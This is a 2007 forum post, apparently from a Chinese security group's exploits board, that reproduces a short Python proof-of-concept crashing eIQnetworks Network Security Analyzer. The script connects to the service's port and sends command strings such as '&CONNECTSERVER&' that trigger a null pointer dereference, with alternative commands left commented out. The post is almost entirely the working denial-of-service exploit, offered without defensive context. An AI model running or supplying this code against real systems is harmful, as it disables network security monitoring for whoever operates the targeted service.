邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit [查看完整版本]

pub!1c 2007-1-16 12:15

eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit

<p>[code]</p><pre>#!c:\python\python.exe
# uncomment whichever function youd like. theyll all crash in a similar way.

# Any of the following "function names" will cause the service to throw an access violation
# while dereferencing the return value from a call to FindIndex
# ( [url]http://msdn2.microsoft.com/de-de/library/a93550bb[/url](VS.80).aspx):

# Ethan Hunt <m34r\[@\]hackermail.com>

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()
</pre><p>[/code]</p>

查看完整版本: eIQnetworks Network Security Analyzer Null Pointer Dereference Exploit

© 1999-2008 EvilOctal Security Team